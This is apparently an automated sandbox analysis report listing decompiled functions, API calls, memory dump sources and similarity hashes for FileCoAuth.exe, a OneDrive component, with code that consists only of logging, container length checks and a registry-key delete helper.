    0x00ea1488
    0x00ea148b
    0x00ea1493
    0x00ea1494
    0x00ea1495
    0x00ea149a
    0x00ea14a1
    0x00ea14a5
    0x00ea14ac
    0x00ea14b3
    0x00ea14b3
    0x00ea14b9
    0x00ea14bc
    0x00ea14c1
    0x00ea14c4
    0x00ea14c6
    0x00ea14c9
    0x00ea14cc
    0x00ea14d0
    0x00ea14e0
    0x00ea14e4
    0x00ea14f2
    0x00ea14f5
    0x00ea14f7
    0x00ea14fa
    0x00ea14fc
    0x00ea14fc
    0x00ea14e6
    0x00ea14e6
    0x00ea14e8
    0x00ea14ea
    0x00ea14ec
    0x00ea14ee
    0x00ea14ee
    0x00ea14ec
    0x00ea14d2
    0x00ea14d2
    0x00ea14d7
    0x00ea14db
    0x00ea14db
    0x00ea14ff
    0x00ea1502
    0x00ea159c
    0x00ea1509
    0x00ea150c
    0x00ea150f
    0x00ea1511
    0x00ea1513
    0x00ea154d
    0x00ea1551
    0x00ea156d
    0x00ea156f
    0x00ea1571
    0x00ea1576
    0x00ea1576
    0x00ea1580
    0x00ea158a
    0x00ea1594
    0x00ea1599
    0x00ea1599
    0x00000000
    0x00ea1599
    0x00ea1553
    0x00ea1553
    0x00ea1557
    0x00ea1561
    0x00ea1568
    0x00000000
    0x00ea1568
    0x00ea1515
    0x00ea1518
    0x00ea151c
    0x00000000
    0x00000000
    0x00ea151e
    0x00ea1521
    0x00ea1523
    0x00ea1528
    0x00ea1528
    0x00ea1532
    0x00ea153c
    0x00ea1546
    0x00000000
    0x00ea1546
    0x00ea15ad
    0x00ea15b1
    0x00ea15b4
    0x00ea15b8

    APIs
    • ??3@YAXPAX@Z.MSVCR120 ref: 00EA148B
    • _CxxThrowException.MSVCR120(00000000,00000000), ref: 00EA1495
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(map/set<T> too long), ref: 00EA14B3
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@ExceptionThrowXlength_error@std@@
    • String ID: map/set<T> too long
    • API String ID: 2603369972-1285458680
    • Opcode ID: a6870c621c2f2552908cf7250b3a0e35688a818d6989c42391d18c9bf42c5d6c
    • Instruction ID: 590eae2b107c7b1223e92e1d2b9b7cbac607043abd610aedc24a4e84e4a4c94f
    • Opcode Fuzzy Hash: a6870c621c2f2552908cf7250b3a0e35688a818d6989c42391d18c9bf42c5d6c
    • Instruction Fuzzy Hash: D6016975204201AFC704DF19D889956BBE5FB4E354B29D0AAF919AF322C771EC10CB61
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E94350, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
    Download Yara Rule
    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp,00000014,StorageProviderFinder::GetAccountInstanceByPath,00EA7810,B6386A17,00000001,00000002,00000001), ref: 00E943C9
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E943CF
    Strings
    • StorageProviderFinder::GetAccountInstanceByPath, xrefs: 00E943AC
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp, xrefs: 00E943B3
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: StorageProviderFinder::GetAccountInstanceByPath$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp
    • API String ID: 2559330748-1576029408
    • Opcode ID: 6da8f4922592bf951a8544e458276d298b4890a72a77d765a1f3dfcf9f9377d8
    • Instruction ID: 7ff90248ef545cf6c1c02fd62c04169b85ca64510d37cd09428708cb4a4fe49a
    • Opcode Fuzzy Hash: 6da8f4922592bf951a8544e458276d298b4890a72a77d765a1f3dfcf9f9377d8
    • Instruction Fuzzy Hash: DA01C4B0A45209AFCB08DF69DC06BEEBBB4EB9E704F50912DE9467B280C6716905CB54
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E94488, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
    Download Yara Rule
    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp,00000096,StorageProviderFinder::GetStorageProviderFromRot,00EA7810,F59FF406,00000001,00000002,00000001), ref: 00E94504
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E9450A
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp, xrefs: 00E944EE
    • StorageProviderFinder::GetStorageProviderFromRot, xrefs: 00E944E4
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: StorageProviderFinder::GetStorageProviderFromRot$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp
    • API String ID: 2559330748-509154929
    • Opcode ID: 48c93ddc4d82db42dbd0685d8f2423ce2780d4c5c9680ecd80886c3049ac2f67
    • Instruction ID: 9e0bf856951088256154f104153f5724b34af578ff2ea5936bb9130024f75699
    • Opcode Fuzzy Hash: 48c93ddc4d82db42dbd0685d8f2423ce2780d4c5c9680ecd80886c3049ac2f67
    • Instruction Fuzzy Hash: 1801C470A45309ABDB18DF69DC46FAFBBB0EB9D700F50511DE816BA280C6716906CB44
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E93BF5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
    Download Yara Rule
    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,00000026,SyncEngineFileInfoProvider::GetPropertyHandlerFromPath,00EA7810,00C5D339,00000001,00000002,00000001), ref: 00E93C6E
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E93C74
    Strings
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromPath, xrefs: 00E93C51
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93C58
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromPath$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-2046853744
    • Opcode ID: 92c770012fdfc7ec20c3e3ff7259e99a231d3a164f48808f0b33ac59d37b5452
    • Instruction ID: 4f49cc8ebdb076e90eb508ebfcf4237112324b4663d9152db68c1274af38fd24
    • Opcode Fuzzy Hash: 92c770012fdfc7ec20c3e3ff7259e99a231d3a164f48808f0b33ac59d37b5452
    • Instruction Fuzzy Hash: 0801AD74A41209ABCB14DF68DC06BAEFBB0EB9E700F50412DEC06BB280C6B16A058B54
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E93C8A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
    Download Yara Rule
    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,00000044,SyncEngineFileInfoProvider::GetPropertyHandlerFromUri,00EA7810,C5EF5D3B,00000001,00000002,00000001), ref: 00E93D03
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E93D09
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93CED
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromUri, xrefs: 00E93CE6
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromUri$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-3724481269
    • Opcode ID: e58b825e6f1f9d4015e6b5337309aef9f00999a7295a4b0c23411d8bcc2bfb41
    • Instruction ID: 3369b62c450b541f537e57ed50e93eb7321b3c89b27e23633ee4967bb0bcb0df
    • Opcode Fuzzy Hash: e58b825e6f1f9d4015e6b5337309aef9f00999a7295a4b0c23411d8bcc2bfb41
    • Instruction Fuzzy Hash: CA010074A01209ABCB04DF68CC46BAFBBB0EF9E300F50451EF806BB281C6B16A05CB54
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E93DE2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
    Download Yara Rule
    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,00000049,SyncEngineFileInfoProvider::GetPropertyHandlerFromUri,00EA7810,5693976C,00000001,00000002,00000001), ref: 00E93E5B
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E93E61
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93E45
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromUri, xrefs: 00E93E3E
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromUri$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-3724481269
    • Opcode ID: f3336e1ca62b3dff2e326e6325daf5d12f23293cad29c4108de039d8e7ad127f
    • Instruction ID: 03c1581f921314def6554ad8b691a340d77b9f8dd3600c0652808ebad31e7c66
    • Opcode Fuzzy Hash: f3336e1ca62b3dff2e326e6325daf5d12f23293cad29c4108de039d8e7ad127f
    • Instruction Fuzzy Hash: D301ED74A00309AFCB04DF68DC46BAFBBB0EB9D300F40412EF806BA281C6B06A018B44
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E93D1F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
    Download Yara Rule
    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,00000067,SyncEngineFileInfoProvider::GetPropertyHandlerFromFileId,00EA7810,362B50B0,00000001,00000002,00000001), ref: 00E93D98
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E93D9E
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93D82
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromFileId, xrefs: 00E93D7B
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromFileId$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-3436440607
    • Opcode ID: 79864ad5d11328438f2e1f41f449b02f4da9d2f0b18575ce0fe9513f3b51cff8
    • Instruction ID: a3f8737d655dc9b1a1db7cb71381f0751bac65cce2de1ea42b87c8cb4c7d738c
    • Opcode Fuzzy Hash: 79864ad5d11328438f2e1f41f449b02f4da9d2f0b18575ce0fe9513f3b51cff8
    • Instruction Fuzzy Hash: 1201AD74A45209ABDF14DF68DC96BAEBBB4EB8D704F50411EF816BF280C6B16A05CB44
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E93E77, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
    Download Yara Rule
    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,0000006C,SyncEngineFileInfoProvider::GetPropertyHandlerFromFileId,00EA7810,66B31198,00000001,00000002,00000001), ref: 00E93EF0
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E93EF6
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93EDA
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromFileId, xrefs: 00E93ED3
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromFileId$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-3436440607
    • Opcode ID: ab55dc4cce313beda002d35a865576dc791687a5edc14caca1a78524e21b71d2
    • Instruction ID: 2d8d445964a34803b6cbc665b7a8d8f1bb556619ac2ee5c155c1deb718ac3b4e
    • Opcode Fuzzy Hash: ab55dc4cce313beda002d35a865576dc791687a5edc14caca1a78524e21b71d2
    • Instruction Fuzzy Hash: 7101C474A41309AFDB04DF69DC46BAFBBB4EB5E700F50411EF846BB280C6B16A05CB44
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9E837, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON
    Download Yara Rule
    C-Code - Quality: 25%
    			E00E9E837() {
				intOrPtr _v4;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				intOrPtr* _t21;
				intOrPtr _t22;
				intOrPtr _t31;
				intOrPtr* _t34;

				_push(_v20);
				L00EA29EC();
				_pop(_t21);
				_push(0);
				_push(0);
				L00EA3138();
				asm("int3");
				_t34 = _t21;
				_t31 = _v4;
				_t22 =  *((intOrPtr*)(_t34 + 4));
				asm("cdq");
				_t13 = ( *((intOrPtr*)(_t34 + 8)) - _t22) / 0x11c;
				if(_t13 < _t31) {
					asm("cdq");
					_t15 = (_t22 -  *_t34) / 0x11c;
					if(0xe6c2b4 - (_t22 -  *_t34) / 0x11c < _t31) {
						__imp__?_Xlength_error@std@@YAXPBD@Z("vector<T> too long");
					}
					_push(E00E9E54E(_t34, _t15 + _t31));
					_t13 = E00E9E6A1(0x11c, _t34, _t31, _t34, _t15 + _t31);
				}
				return _t13;
			}













    0x00e9e837
    0x00e9e83a
    0x00e9e83f
    0x00e9e840
    0x00e9e842
    0x00e9e844
    0x00e9e849
    0x00e9e851
    0x00e9e859
    0x00e9e85f
    0x00e9e864
    0x00e9e865
    0x00e9e869
    0x00e9e874
    0x00e9e875
    0x00e9e87b
    0x00e9e882
    0x00e9e882
    0x00e9e892
    0x00e9e895
    0x00e9e895
    0x00e9e89e

    APIs
    • ??3@YAXPAX@Z.MSVCR120 ref: 00E9E83A
    • _CxxThrowException.MSVCR120(00000000,00000000), ref: 00E9E844
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long), ref: 00E9E882
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@ExceptionThrowXlength_error@std@@
    • String ID: vector<T> too long
    • API String ID: 2603369972-3788999226
    • Opcode ID: f7f2d0e261133080f429d370010314545679ef50423f9b2225501217681886bc
    • Instruction ID: 87c134617c4e83cdc47e9aab4195626e218983b4acd65c8a64361101a700fa18
    • Opcode Fuzzy Hash: f7f2d0e261133080f429d370010314545679ef50423f9b2225501217681886bc
    • Instruction Fuzzy Hash: 69F096363402142BCA1CEAAD9C56A6EBADACBED720F245429F746F7392CC61BC108194
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E91F75, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 18%
    			E00E91F75(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t8;
				intOrPtr* _t12;

				_t12 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 1;
					}
					return RegDeleteKeyW();
				}
				_t7 = GetModuleHandleW(L"Advapi32.dll");
				if(_t7 == 0) {
					goto L6;
				}
				_t8 = GetProcAddress(_t7, "RegDeleteKeyTransactedW");
				if(_t8 == 0) {
					goto L6;
				}
				return  *_t8(_a4, _a8, 0, 0,  *_t12, 0);
			}






    0x00e91f7b
    0x00e91f82
    0x00e91fb5
    0x00e91fc0
    0x00000000
    0x00e91fc2
    0x00e91fba
    0x00e91fba
    0x00e91f89
    0x00e91f91
    0x00000000
    0x00000000
    0x00e91f99
    0x00e91fa1
    0x00000000
    0x00000000
    0x00000000

    APIs
    • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00E91F89
    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00E91F99
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: Advapi32.dll$RegDeleteKeyTransactedW
    • API String ID: 1646373207-2168864297
    • Opcode ID: 4f8fbac519bc8ccb15f5ff45f51e24393e6c46f274cbc5a954db5b1681aa3c1e
    • Instruction ID: 4dfcd4b92880961fdc85b23a08cee66563c81a9e1e175fbf2eb45a1ae9282575
    • Opcode Fuzzy Hash: 4f8fbac519bc8ccb15f5ff45f51e24393e6c46f274cbc5a954db5b1681aa3c1e
    • Instruction Fuzzy Hash: 37F08237304209BA8F311A56AC08D677BE8EFCBBA2305547AF455F1010D731A88AE660
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E959AD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON
    Download Yara Rule
    C-Code - Quality: 16%
    			E00E959AD() {
				signed int _v8;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				signed int _t7;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				signed int _t17;

				_t7 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t7 ^ _t17;
				_v28 = "moniker";
				_v32 = 3;
				_v24 = 2;
				__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z(0x4b, "RunningObjectTableHelper::GetObjectW", 0xea7d10, 0xe181350, 1, 1,  &_v32);
				__imp__?LoggingRotateIfNeeded@@YGXXZ();
				return E00EA29F2(_t11, _v8 ^ _t17, _t14, _t15, _t16, "d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\runningobjecttablehelper.cpp");
			}













    0x00e959b5
    0x00e959bc
    0x00e959c2
    0x00e959e4
    0x00e959eb
    0x00e959f2
    0x00e959f8
    0x00e95a0b

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp,0000004B,RunningObjectTableHelper::GetObjectW,00EA7D10,0E181350,00000001,00000001,00000000), ref: 00E959F2
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E959F8
    Strings
    • RunningObjectTableHelper::GetObjectW, xrefs: 00E959D8
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp, xrefs: 00E959DF
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: RunningObjectTableHelper::GetObjectW$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp
    • API String ID: 2559330748-295430105
    • Opcode ID: 3697de5d0449d3308135046bceb15dcf6cf096e3024b86ef211ab70caed07f01
    • Instruction ID: 09122b9f404f349c69a1def7d253d353e5521608645c86033eb7b0b375fd583a
    • Opcode Fuzzy Hash: 3697de5d0449d3308135046bceb15dcf6cf096e3024b86ef211ab70caed07f01
    • Instruction Fuzzy Hash: FAF08271A44308AFC700EF55CC0BBAFBBB4AB5EB00F405119B9457A281C6B17A098B94
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E95A0E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 11COMMON
    Download Yara Rule
    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp,00000050,RunningObjectTableHelper::GetObjectW,00EA7D10,EBE5568C,00000001,00000000,00000000,00E955AC,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp,00000049), ref: 00E95A2A
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM(?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp,00000049,?,?,?,?,RunningObjectTableHelper::GetObjectW), ref: 00E95A30
    Strings
    • RunningObjectTableHelper::GetObjectW, xrefs: 00E95A1E
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp, xrefs: 00E95A25
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: RunningObjectTableHelper::GetObjectW$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp
    • API String ID: 2559330748-295430105
    • Opcode ID: 8147df401e24712878e9bd4cb05fe2cfed9bdd22cf29c9b09c6f64720a11aaec
    • Instruction ID: 7df8461c51ec80e3a885e2a7624c2ebc60d3a2645a460b5310ab5903c742e9c4
    • Opcode Fuzzy Hash: 8147df401e24712878e9bd4cb05fe2cfed9bdd22cf29c9b09c6f64720a11aaec
    • Instruction Fuzzy Hash: B1C04C713D53407EE520AB119D0BF0A6D61576FF12F15641073957C0D285E13055891C
    Uniqueness

    Uniqueness Score: -1,00%

